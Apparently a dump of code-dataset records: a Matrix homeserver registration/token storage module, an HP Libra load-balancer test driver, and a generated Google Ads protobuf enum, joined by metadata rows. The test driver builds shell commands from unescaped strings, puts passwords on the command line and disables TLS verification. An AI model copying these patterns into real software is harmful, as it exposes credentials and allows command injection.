user_id,
token,
password_hash,
was_guest,
make_guest,
appservice_id,
create_profile_with_localpart,
admin,
):
now = int(self.clock.time())
next_id = self._access_tokens_id_gen.get_next()
try:
if was_guest:
# Ensure that the guest user actually exists
# ``allow_none=False`` makes this raise an exception
# if the row isn't in the database.
self._simple_select_one_txn(
txn,
"users",
keyvalues={
"name": user_id,
"is_guest": 1,
},
retcols=("name",),
allow_none=False,
)
self._simple_update_one_txn(
txn,
"users",
keyvalues={
"name": user_id,
"is_guest": 1,
},
updatevalues={
"password_hash": password_hash,
"upgrade_ts": now,
"is_guest": 1 if make_guest else 0,
"appservice_id": appservice_id,
"admin": 1 if admin else 0,
}
)
else:
self._simple_insert_txn(
txn,
"users",
values={
"name": user_id,
"password_hash": password_hash,
"creation_ts": now,
"is_guest": 1 if make_guest else 0,
"appservice_id": appservice_id,
"admin": 1 if admin else 0,
}
)
except self.database_engine.module.IntegrityError:
raise StoreError(
400, "User ID already taken.", errcode=Codes.USER_IN_USE
)
if token:
# it's possible for this to get a conflict, but only for a single user
# since tokens are namespaced based on their user ID
txn.execute(
"INSERT INTO access_tokens(id, user_id, token)"
" VALUES (?,?,?)",
(next_id, user_id, token,)
)
if create_profile_with_localpart:
txn.execute(
"INSERT INTO profiles(user_id) VALUES (?)",
(create_profile_with_localpart,)
)
self._invalidate_cache_and_stream(
txn, self.get_user_by_id, (user_id,)
)
txn.call_after(self.is_guest.invalidate, (user_id,))
@cached()
def get_user_by_id(self, user_id):
return self._simple_select_one(
table="users",
keyvalues={
"name": user_id,
},
retcols=["name", "password_hash", "is_guest"],
allow_none=True,
desc="get_user_by_id",
)
def get_users_by_id_case_insensitive(self, user_id):
"""Gets users that match user_id case insensitively.
Returns a mapping of user_id -> password_hash.
"""
def f(txn):
sql = (
"SELECT name, password_hash FROM users"
" WHERE lower(name) = lower(?)"
)
txn.execute(sql, (user_id,))
return dict(txn.fetchall())
return self.runInteraction("get_users_by_id_case_insensitive", f)
def user_set_password_hash(self, user_id, password_hash):
"""
NB. This does *not* evict any cache because the one use for this
removes most of the entries subsequently anyway so it would be
pointless. Use flush_user separately.
"""
def user_set_password_hash_txn(txn):
self._simple_update_one_txn(
txn,
'users', {
'name': user_id
},
{
'password_hash': password_hash
}
)
self._invalidate_cache_and_stream(
txn, self.get_user_by_id, (user_id,)
)
return self.runInteraction(
"user_set_password_hash", user_set_password_hash_txn
)
@defer.inlineCallbacks
def user_delete_access_tokens(self, user_id, except_token_id=None,
device_id=None,
delete_refresh_tokens=False):
"""
Invalidate access/refresh tokens belonging to a user
Args:
user_id (str): ID of user the tokens belong to
except_token_id (str): list of access_tokens IDs which should
*not* be deleted
device_id (str|None): ID of device the tokens are associated with.
If None, tokens associated with any device (or no device) will
be deleted
delete_refresh_tokens (bool): True to delete refresh tokens as
well as access tokens.
Returns:
defer.Deferred:
"""
def f(txn):
keyvalues = {
"user_id": user_id,
}
if device_id is not None:
keyvalues["device_id"] = device_id
if delete_refresh_tokens:
self._simple_delete_txn(
txn,
table="refresh_tokens",
keyvalues=keyvalues,
)
items = keyvalues.items()
where_clause = " AND ".join(k + " = ?" for k, _ in items)
values = [v for _, v in items]
if except_token_id:
where_clause += " AND id != ?"
values.append(except_token_id)
txn.execute(
"SELECT token FROM access_tokens WHERE %s" % where_clause,
values
)
rows = self.cursor_to_dict(txn)
for row in rows:
self._invalidate_cache_and_stream(
txn, self.get_user_by_access_token, (row["token"],)
)
txn.execute(
"DELETE FROM access_tokens WHERE %s" % where_clause,
values
)
yield self.runInteraction(
"user_delete_access_tokens", f,
)
def delete_access_token(self, access_token):
def f(txn):
self._simple_delete_one_txn(
txn,
table="access_tokens",
keyvalues={
"token": access_token
},
)
self._invalidate_cache_and_stream(
txn, self.get_user_by_access_token, (access_token,)
)
return self.runInteraction("delete_access_token", f)
@cached()
def get_user_by_access_token(self, token):
"""Get a user from the given access token.
Args:
token (str): The access token of a user.
Returns:
defer.Deferred: None, if the token did not match, otherwise dict
including the keys `name`, `is_guest`, `device_id`, `token_id`.
"""
return self.runInteraction(
"get_user_by_access_token",
self._query_for_auth,
token
)
@defer.inlineCallbacks
def is_server_admin(self, user):
res = yield self._simple_select_one_onecol(
table="users",
keyvalues={"name": user.to_string()},
retcol="admin",
allow_none=True,
desc="is_server_admin",
)
defer.returnValue(res if res else False)
@cachedInlineCallbacks()
def is_guest(self, user_id):
res = yield self._simple_select_one_onecol(
table="users",
keyvalues={"name": user_id},
retcol="is_guest",
allow_none=True,
desc="is_guest",
)
defer.returnValue(res if res else False)
def _query_for_auth(self, txn, token):
sql = (
"SELECT users.name, users.is_guest, access_tokens.id as token_id,"
" access_tokens.device_id"
" FROM users"
" INNER JOIN access_tokens on users.name = access_tokens.user_id"
" WHERE token = ?"
)
txn.execute(sql, (token,))
rows = self.cursor_to_dict(txn)
if rows:
return rows[0]
return None
@defer.inlineCallbacks
def user_add_threepid(self, user_id, medium, address, validated_at, added_at):
yield self._simple_upsert("user_threepids", {
"medium": medium,
"address": address,
}, {
"user_id": user_id,
"validated_at": validated_at,
"added_at": added_at,
})
@defer.inlineCallbacks
def user_get_threepids(self, user_id):
ret = yield self._simple_select_list(
"user_threepids", {
"user_id": user_id
},
['medium', 'address', 'validated_at', 'added_at'],
'user_get_threepids'
)
defer.returnValue(ret)
@defer.inlineCallbacks
def get_user_id_by_threepid(self, medium, address):
ret = yield self._simple_select_one(
"user_threepids",
{
"medium": medium,
"address": address
},
['user_id'], True, 'get_user_id_by_threepid'
)
if ret:
defer.returnValue(ret['user_id'])
defer.returnValue(None)
def user_delete_threepids(self, user_id):
return self._simple_delete(
"user_threepids",
keyvalues={
"user_id": user_id,
},
desc="user_delete_threepids",
)
def user_delete_threepid(self, user_id, medium, address):
return self._simple_delete(
"user_threepids",
keyvalues={
"user_id": user_id,
"medium": medium,
"address": address,
},
desc="user_delete_threepids",
)
@defer.inlineCallbacks
def count_all_users(self):
"""Counts all users registered on the homeserver."""
def _count_users(txn):
txn.execute("SELECT COUNT(*) AS users FROM users")
rows = self.cursor_to_dict(txn)
if rows:
return rows[0]["users"]
return 0
ret = yield self.runInteraction("count_users", _count_users)
defer.returnValue(ret)
@defer.inlineCallbacks
def find_next_generated_user_id_localpart(self):
"""
Gets the localpart of the next generated user ID.
Generated user IDs are integers, and we aim for them to be as small as
we can. Unfortunately, it's possible some of them are already taken by
existing users, and there may be gaps in the already taken range. This
function returns the start of the first allocatable gap. This is to
avoid the case of ID 10000000 being pre-allocated, so us wasting the
first (and shortest) many generated user IDs.
"""
def _find_next_generated_user_id(txn):
txn.execute("SELECT name FROM users")
rows = self.cursor_to_dict(txn)
regex = re.compile("^@(\d+):")
found = set()
for r in rows:
user_id = r["name"]
match = regex.search(user_id)
if match:
found.add(int(match.group(1)))
for i in xrange(len(found) + 1):
if i not in found:
return i
defer.returnValue((yield self.runInteraction(
"find_next_generated_user_id",
_find_next_generated_user_id
)))
@defer.inlineCallbacks
def get_3pid_guest_access_token(self, medium, address):
ret = yield self._simple_select_one(
"threepid_guest_access_tokens",
{
"medium": medium,
"address": address
},
["guest_access_token"], True, 'get_3pid_guest_access_token'
)
if ret:
defer.returnValue(ret["guest_access_token"])
defer.returnValue(None)
@defer.inlineCallbacks
def save_or_get_3pid_guest_access_token(
self, medium, address, access_token, inviter_user_id
):
"""
Gets the 3pid's guest access token if exists, else saves access_token.
Args:
medium (str): Medium of the 3pid. Must be "email".
address (str): 3pid address.
access_token (str): The access token to persist if none is
already persisted.
inviter_user_id (str): User ID of the inviter.
Returns:
deferred str: Whichever access token is persisted at the end
of this function call.
"""
def insert(txn):
txn.execute(
"INSERT INTO threepid_guest_access_tokens "
"(medium, address, guest_access_token, first_inviter) "
"VALUES (?, ?, ?, ?)",
(medium, address, access_token, inviter_user_id)
)
try:
yield self.runInteraction("save_3pid_guest_access_token", insert)
defer.returnValue(access_token)
except self.database_engine.module.IntegrityError:
ret = yield self.get_3pid_guest_access_token(medium, address)
defer.returnValue(ret)
| [
"[email protected]"
]
| |
e9e15aabeeb19d067d2268bae9dc0e125bd40664 | 0286c905b0b2d7e956940524aa65668c3e4347fd | /driver/python-client.py | 12db4b64292961ae24c1aeb85ba208e50c97dfb8 | []
| no_license | pcrews/libra-integration-tests | 44e4597805d27423cf22a8c3f206305248d87766 | 0f3ee771512d2e859fe52bbcfd1d9f25d02f89b5 | refs/heads/master | 2021-01-23T07:26:51.001891 | 2014-05-06T18:57:00 | 2014-05-06T18:57:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,365 | py | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" python-client.py
methods for interacting with the lbaas service
via python-libraclient requests
"""
import os
import ast
import json
import time
import requests
import commands
class lbaasDriver:
""" Driver to handle http interaction with the libra lbaas service
Contains methods to call the various api methods as well as
code for validating the actions
"""
def __init__(self, args, api_user_url):
""" TODO: put in validation and api-specific whatnot here """
self.args = args
self.api_user_url = api_user_url
self.supported_algorithms = ['ROUND_ROBIN', 'LEAST_CONNECTIONS', None]
self.user_name = args.osusername
self.auth_url = args.osauthurl
self.tenant_name = args.ostenantname
self.password = args.ospassword
self.good_status = args.successstatuscode
self.verbose = args.verbose
self.region_name = args.osregionname
self.base_cmd = ("libra_client --os_auth_url=%s --os_username=%s"
"--os_password=%s --os_tenant_name=%s"
"--os_region_name=%s") % (self.auth_url,
self.user_name,
self.password,
self.tenant_name,
self.region_name)
if args.prodhack:
self.base_cmd += " --bypass_url=%s --insecure" % self.api_user_url
# bit of a hack to eliminate some saltstack garbage
# we get with the client
self.garbage_output = ['/usr/lib/python2.7/getpass.py:83: GetPassWarning: Can not control echo on the terminal.',
'passwd = fallback_getpass(prompt, stream)',
'Warning: Password input may be echoed.',
'Please set a password for your new keyring'
]
self.get_swift_credentials()
return
def get_swift_credentials(self):
""" Get our keystone auth token to work with the api server """
self.swift_endpoint = None
headers = {"Content-Type": "application/json"}
request_data = {'auth': {'tenantName': self.tenant_name,
'passwordCredentials': {'username': self.user_name,
'password': self.password}
}
}
request_data = json.dumps(request_data)
auth_url = self.auth_url
if not self.auth_url.endswith('tokens'):
auth_url = os.path.join(self.auth_url, 'tokens')
request_result = requests.post(auth_url, data=request_data, headers=headers, verify=False)
if self.verbose:
print 'Status: %s' % request_result.status_code
print 'Output:\n%s' % (request_result.text)
request_data = ast.literal_eval(request_result.text)
for service_data in request_data['access']['serviceCatalog']:
if service_data['name'] == 'Object Storage':
self.swift_endpoint = service_data['endpoints'][0]['publicURL'].replace('\\', '')
self.auth_token = request_data['access']['token']['id']
self.tenant_id = request_data['access']['token']['tenant']['id']
return
def trim_garbage_output(self, output):
for garbage_item in self.garbage_output:
output = output.replace(garbage_item, '').strip()
return output
def execute_cmd(self, cmd):
status, output = commands.getstatusoutput(cmd)
output = self.trim_garbage_output(output)
if self.verbose:
print "Command: %s" % cmd
print "Status: %s" % status
print "Output:\n%s" % output
return status, output
def handle_client_side_errors(self, data, client_action=None, algorithm=None):
# a bit of a hack for client-side handling of some bad requests
# python-libraclient appears to detect / check and provide a
# 'you used me wrong' type of message vs. a 'from-the-api-server' error code
status = '512' # default / what brought us here
error_strings = ["Invalid IP:port specified for --node",
"Libra command line client %s: error: argument --algorithm: invalid choice: '%s'" % (client_action, algorithm)
]
for line in data:
for error_string in error_strings:
if error_string in line:
status = '400'
return status
#-----------------
# lbaas functions
#-----------------
def create_lb(self, name, nodes, algorithm, bad_statuses, vip=None):
""" Create a load balancer via the requests library
We expect the url to be the proper, fully constructed base url
we add the 'loadbalancers suffix to the base
nodes is expected to be a list of nodes in this format:
nodes = [{"address": "15.185.227.167","port": "80"},{"address": "15.185.227.165","port": "80"}]
"""
lb_id = None
lb_addr = None
tcp_https_flag = False
cmd = self.base_cmd + ' create --name="%s"' % name
for node in nodes:
node_info = ''
address = ''
port = ''
if 'address' in node:
address = node['address']
if 'port' in node:
port = node['port']
if str(port) == '443':
tcp_https_flag = True
cmd += ' --node=%s:%s' % (address, port)
if algorithm:
cmd += ' --algorithm=%s' % algorithm
if tcp_https_flag:
cmd += ' --protocol=TCP --port=443'
if vip:
cmd += ' --vip=%s' % vip
status, output = self.execute_cmd(cmd)
data = output.split('\n')
if len(data) >= 3 and algorithm in self.supported_algorithms:
data = data[3]
lb_data = data.split('|')
lb_id = lb_data[1].strip()
lb_stats = ast.literal_eval(lb_data[9].strip())
lb_addr = lb_stats[0]['address']
status = self.args.successstatuscode
attempts_remain = 120
time_wait = 1
while not lb_addr and attempts_remain:
result_data = self.list_lb_detail(lb_id)
if 'virtualIps' in result_data:
lb_addr = result_data['virtualIps'][0]['address']
if lb_addr:
attempts_remain = 0
else:
attempts_remain -= 1
time.sleep(time_wait)
else:
attempts_remain -= 1
time.sleep(time_wait)
elif str(status) == '512':
status = self.handle_client_side_errors(data, 'create', algorithm)
else:
data = data[0]
if 'HTTP' in data:
status = data.split('(HTTP')[1].strip().replace(')', '')
return output, status, lb_id, lb_addr # TODO detect error statuses!!!!!
def delete_lb(self, lb_id):
""" Delete the loadbalancer identified by 'lb_id' """
if lb_id:
cmd = self.base_cmd + ' delete --id=%s' % lb_id
status, output = self.execute_cmd(cmd)
return output
def delete_lb_node(self, lb_id, node_id):
""" Remove specified node_id from lb_id """
cmd = self.base_cmd + " node-delete --id=%s --nodeid=%s" % (lb_id, node_id)
status, output = self.execute_cmd(cmd)
if status == 0:
return '202'
return status
def list_lbs(self):
""" List all loadbalancers for the given auth token / tenant id """
url = "%s/loadbalancers" % self.api_user_url
cmd = self.base_cmd + ' list'
status, output = self.execute_cmd(cmd)
data = output.split('\n')
field_names = []
for field_name in data[1].split('|')[1:-1]:
field_names.append(field_name.strip().lower())
loadbalancers = []
data = output.split('\n')[3:-1] # get the 'meat' / data
for lb_row in data:
loadbalancer = {}
lb_data = lb_row.split('|')[1:-1]
for idx, lb_item in enumerate(lb_data):
loadbalancer[field_names[idx]] = lb_item[1:-1]
loadbalancers.append(loadbalancer)
return loadbalancers
def list_lb_detail(self, lb_id):
""" Get the detailed info returned by the api server for the specified id """
cmd = self.base_cmd + ' status --id=%s' % lb_id
status, output = self.execute_cmd(cmd)
data = output.split('\n')
field_names = []
for field_name in data[1].split('|')[1:-1]:
field_names.append(field_name.strip().lower())
data = output.split('\n')[3:-1][0] # get the 'meat' / data and expect one line
# expect a single line of detail data
loadbalancer_detail = {}
lb_data = data.split('|')[1:-1]
for idx, lb_item in enumerate(lb_data):
if field_names[idx] == 'nodes':
loadbalancer_detail[field_names[idx]] = ast.literal_eval(lb_item.strip())
else:
loadbalancer_detail[field_names[idx]] = lb_item[1:-1]
return loadbalancer_detail
def list_lb_nodes(self, lb_id):
""" Get list of nodes for the specified lb_id """
cmd = self.base_cmd + ' node-list --id=%s' % lb_id
status, output = self.execute_cmd(cmd)
data = output.split('\n')
field_names = []
for field_name in data[1].split('|')[1:-1]:
field_names.append(field_name.strip().lower())
node_dict = {}
node_list = []
data = output.split('\n')[3:-1] # get the 'meat' / data
for node_row in data:
node = {}
node_data = node_row.split('|')[1:-1]
for idx, node_item in enumerate(node_data):
node[field_names[idx]] = node_item.strip()
node_list.append(node)
node_dict['nodes'] = node_list
return node_dict
def update_lb(self, lb_id, update_data):
""" We get a dictionary of update_data
containing a new name, algorithm, or both
and we execute an UPDATE API call and see
what happens
"""
cmd = self.base_cmd + ' modify --id=%s' % (lb_id)
if 'name' in update_data:
cmd += ' --name="%s"' % update_data['name']
if 'algorithm' in update_data:
cmd += ' --algorithm=%s' % update_data['algorithm']
status, output = self.execute_cmd(cmd)
data = output.split('\n')
if output.strip() in ['', ':']:
status = self.good_status
elif str(status) == '512':
status = self.handle_client_side_errors(data, 'modify', update_data['algorithm'])
else:
data = data[0]
if 'HTTP' in data:
status = data.split('(HTTP')[1].strip().replace(')', '')
return status
def add_nodes(self, lb_id, add_node_data):
""" We get a list of nodes we want to add and
try to add them :)
"""
cmd = self.base_cmd + ' node-add --id=%s' % (lb_id)
for node in add_node_data:
node_info = ''
address = ''
port = ''
if 'address' in node:
address = node['address']
if 'port' in node:
port = node['port']
if str(port) == '443':
tcp_https_flag = True
cmd += ' --node=%s:%s' % (address, port)
status, output = self.execute_cmd(cmd)
data = output.split('\n')
if 'HTTP' in data[0]:
status = data[0].split('(HTTP')[1].strip().replace(')', '')
elif str(status) == '512':
status = self.handle_client_side_errors(data)
else:
status = self.good_status
return output, status
def modify_node(self, lb_id, node_id, node_data):
""" Set the node's condition to the value specified """
cmd = self.base_cmd + ' node-modify --id=%s --nodeid=%s' % (lb_id, node_id)
if 'condition' in node_data:
cmd += ' --condition=%s' % (node_data['condition'])
if 'address' in node_data or 'port' in node_data:
# hack as client only allows node updates of condition...
return '400'
status, output = self.execute_cmd(cmd)
data = output.split('\n')
if 'HTTP' in data[0]:
status = data[0].split('(HTTP')[1].strip().replace(')', '')
elif str(status) == '512':
status = self.handle_client_side_errors(data)
else:
status = '204'
return status
def get_logs(self, lb_id, auth_token=None, obj_endpoint=None, obj_basepath=None):
""" Get the logs / archive them for the listed lb_id """
if auth_token:
use_token = auth_token
else:
use_token = self.auth_token
if obj_endpoint:
use_endpoint = obj_endpoint
else:
use_endpoint = self.swift_endpoint
if obj_basepath:
use_basepath = obj_basepath
cmd = self.base_cmd + ' logs --id=%s --token=%s --endpoint=%s --basepath=%s' % (lb_id, use_token, use_endpoint, use_basepath)
status, output = self.execute_cmd(cmd)
if not status:
status = '204'
return status
# validation functions
# these should likely live in a separate file, but putting
# validation + actions together for now
def validate_lb_nodes(self, expected_nodes, system_nodes):
""" We go through our list of expected nodes and compare them
to our system nodes
"""
error = 0
error_list = []
if len(expected_nodes) != len(system_nodes):
error_list.append("ERROR: Node mismatch between request and api server detail: %s || %s" % (expected_nodes, system_nodes))
error = 1
for node in expected_nodes:
match = 0
for sys_node in system_nodes:
if not match and node['address'] == sys_node['address'] and int(node['port']) == int(sys_node['port']):
match = 1
if not match:
error_list.append("ERROR: Node: %s has no match from api server" % (node))
error = 1
return error, error_list
def validate_status(self, expected_status, actual_status):
""" See what the result_dictionary status_code is and
compare it to our expected result """
if str(actual_status) == str(expected_status):
result = True
else:
result = False
return result
def validate_lb_list(self, lb_name, loadbalancers):
match = False
for loadbalancer in loadbalancers:
"""
if self.args.verbose:
for key, item in loadbalancer.items():
self.logging.info('%s: %s' % (key, item))
"""
# This is a bit bobo, but we have variable whitespace
# padding in client output depending on other names
# that exist in the lb list and we test with whitespace
# names. Time to make this perfect isn't available, so
# this works for the most part.
if lb_name.strip() == loadbalancer['name'].strip():
match = True
return match
| [
"[email protected]"
]
| |
421594bcaed8aa3f30b6523167db2e27b5eda17b | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v4/proto/errors/extension_setting_error_pb2.py | be7216100728c18ba162b3213ffa8057ae1e1e1b | [
"Apache-2.0"
]
| permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | true | 17,018 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v4/proto/errors/extension_setting_error.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v4/proto/errors/extension_setting_error.proto',
package='google.ads.googleads.v4.errors',
syntax='proto3',
serialized_options=_b('\n\"com.google.ads.googleads.v4.errorsB\032ExtensionSettingErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v4/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V4.Errors\312\002\036Google\\Ads\\GoogleAds\\V4\\Errors\352\002\"Google::Ads::GoogleAds::V4::Errors'),
serialized_pb=_b('\nBgoogle/ads/googleads_v4/proto/errors/extension_setting_error.proto\x12\x1egoogle.ads.googleads.v4.errors\x1a\x1cgoogle/api/annotations.proto\"\x98\x14\n\x19\x45xtensionSettingErrorEnum\"\xfa\x13\n\x15\x45xtensionSettingError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x17\n\x13\x45XTENSIONS_REQUIRED\x10\x02\x12%\n!FEED_TYPE_EXTENSION_TYPE_MISMATCH\x10\x03\x12\x15\n\x11INVALID_FEED_TYPE\x10\x04\x12\x34\n0INVALID_FEED_TYPE_FOR_CUSTOMER_EXTENSION_SETTING\x10\x05\x12%\n!CANNOT_CHANGE_FEED_ITEM_ON_CREATE\x10\x06\x12)\n%CANNOT_UPDATE_NEWLY_CREATED_EXTENSION\x10\x07\x12\x33\n/NO_EXISTING_AD_GROUP_EXTENSION_SETTING_FOR_TYPE\x10\x08\x12\x33\n/NO_EXISTING_CAMPAIGN_EXTENSION_SETTING_FOR_TYPE\x10\t\x12\x33\n/NO_EXISTING_CUSTOMER_EXTENSION_SETTING_FOR_TYPE\x10\n\x12-\n)AD_GROUP_EXTENSION_SETTING_ALREADY_EXISTS\x10\x0b\x12-\n)CAMPAIGN_EXTENSION_SETTING_ALREADY_EXISTS\x10\x0c\x12-\n)CUSTOMER_EXTENSION_SETTING_ALREADY_EXISTS\x10\r\x12\x35\n1AD_GROUP_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE\x10\x0e\x12\x35\n1CAMPAIGN_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE\x10\x0f\x12\x35\n1CUSTOMER_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE\x10\x10\x12\x16\n\x12VALUE_OUT_OF_RANGE\x10\x11\x12$\n CANNOT_SET_FIELD_WITH_FINAL_URLS\x10\x12\x12\x16\n\x12\x46INAL_URLS_NOT_SET\x10\x13\x12\x18\n\x14INVALID_PHONE_NUMBER\x10\x14\x12*\n&PHONE_NUMBER_NOT_SUPPORTED_FOR_COUNTRY\x10\x15\x12-\n)CARRIER_SPECIFIC_SHORT_NUMBER_NOT_ALLOWED\x10\x16\x12#\n\x1fPREMIUM_RATE_NUMBER_NOT_ALLOWED\x10\x17\x12\x1a\n\x16\x44ISALLOWED_NUMBER_TYPE\x10\x18\x12(\n$INVALID_DOMESTIC_PHONE_NUMBER_FORMAT\x10\x19\x12#\n\x1fVANITY_PHONE_NUMBER_NOT_ALLOWED\x10\x1a\x12\x18\n\x14INVALID_COUNTRY_CODE\x10\x1b\x12#\n\x1fINVALID_CALL_CONVERSION_TYPE_ID\x10\x1c\x12-\n)CUSTOMER_NOT_WHITELISTED_FOR_CALLTRACKING\x10\x1d\x12*\n&CALLTRACKING_NOT_SUPPORTED_FOR_COUNTRY\x10\x1e\x12\x12\n\x0eINVALID_APP_ID\x10\x1f\x12&\n\"QUOTES_IN_REVIEW_EXTENSION_SNIPPET\x10 \x12\'\n#HYPHENS_IN_REVIEW_EXTENSION_SNIPPET\x10!\x12(\n$REVIEW_EXTENSION_SOURCE_NOT_ELIGIBLE\x10\"\x12(\n$SOURCE_NAME_IN_REVIEW_EXTENSION_TEXT\x10#\x12\x11\n\rMISSING_FIELD\x10$\x12\x1f\n\x1bINCONSISTENT_CURRENCY_CODES\x10%\x12*\n&PRICE_EXTENSION_HAS_DUPLICATED_HEADERS\x10&\x12\x34\n0PRICE_ITEM_HAS_DUPLICATED_HEADER_AND_DESCRIPTION\x10\'\x12%\n!PRICE_EXTENSION_HAS_TOO_FEW_ITEMS\x10(\x12&\n\"PRICE_EXTENSION_HAS_TOO_MANY_ITEMS\x10)\x12\x15\n\x11UNSUPPORTED_VALUE\x10*\x12\x1d\n\x19INVALID_DEVICE_PREFERENCE\x10+\x12\x18\n\x14INVALID_SCHEDULE_END\x10-\x12*\n&DATE_TIME_MUST_BE_IN_ACCOUNT_TIME_ZONE\x10/\x12%\n!OVERLAPPING_SCHEDULES_NOT_ALLOWED\x10\x30\x12 \n\x1cSCHEDULE_END_NOT_AFTER_START\x10\x31\x12\x1e\n\x1aTOO_MANY_SCHEDULES_PER_DAY\x10\x32\x12&\n\"DUPLICATE_EXTENSION_FEED_ITEM_EDIT\x10\x33\x12\x1b\n\x17INVALID_SNIPPETS_HEADER\x10\x34\x12<\n8PHONE_NUMBER_NOT_SUPPORTED_WITH_CALLTRACKING_FOR_COUNTRY\x10\x35\x12\x1f\n\x1b\x43\x41MPAIGN_TARGETING_MISMATCH\x10\x36\x12\"\n\x1e\x43\x41NNOT_OPERATE_ON_REMOVED_FEED\x10\x37\x12\x1b\n\x17\x45XTENSION_TYPE_REQUIRED\x10\x38\x12-\n)INCOMPATIBLE_UNDERLYING_MATCHING_FUNCTION\x10\x39\x12\x1d\n\x19START_DATE_AFTER_END_DATE\x10:\x12\x18\n\x14INVALID_PRICE_FORMAT\x10;\x12\x1a\n\x16PROMOTION_INVALID_TIME\x10<\x12<\n8PROMOTION_CANNOT_SET_PERCENT_DISCOUNT_AND_MONEY_DISCOUNT\x10=\x12>\n:PROMOTION_CANNOT_SET_PROMOTION_CODE_AND_ORDERS_OVER_AMOUNT\x10>\x12%\n!TOO_MANY_DECIMAL_PLACES_SPECIFIED\x10?\x12\x19\n\x15INVALID_LANGUAGE_CODE\x10@\x12\x18\n\x14UNSUPPORTED_LANGUAGE\x10\x41\x12\x30\n,CUSTOMER_CONSENT_FOR_CALL_RECORDING_REQUIRED\x10\x42\x12&\n\"EXTENSION_SETTING_UPDATE_IS_A_NOOP\x10\x43\x42\xf5\x01\n\"com.google.ads.googleads.v4.errorsB\x1a\x45xtensionSettingErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v4/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V4.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V4\\Errors\xea\x02\"Google::Ads::GoogleAds::V4::Errorsb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR = _descriptor.EnumDescriptor(
name='ExtensionSettingError',
full_name='google.ads.googleads.v4.errors.ExtensionSettingErrorEnum.ExtensionSettingError',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXTENSIONS_REQUIRED', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FEED_TYPE_EXTENSION_TYPE_MISMATCH', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_FEED_TYPE', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_FEED_TYPE_FOR_CUSTOMER_EXTENSION_SETTING', index=5, number=5,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_CHANGE_FEED_ITEM_ON_CREATE', index=6, number=6,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_UPDATE_NEWLY_CREATED_EXTENSION', index=7, number=7,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NO_EXISTING_AD_GROUP_EXTENSION_SETTING_FOR_TYPE', index=8, number=8,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NO_EXISTING_CAMPAIGN_EXTENSION_SETTING_FOR_TYPE', index=9, number=9,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NO_EXISTING_CUSTOMER_EXTENSION_SETTING_FOR_TYPE', index=10, number=10,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AD_GROUP_EXTENSION_SETTING_ALREADY_EXISTS', index=11, number=11,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CAMPAIGN_EXTENSION_SETTING_ALREADY_EXISTS', index=12, number=12,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CUSTOMER_EXTENSION_SETTING_ALREADY_EXISTS', index=13, number=13,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AD_GROUP_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE', index=14, number=14,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CAMPAIGN_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE', index=15, number=15,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CUSTOMER_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE', index=16, number=16,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VALUE_OUT_OF_RANGE', index=17, number=17,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
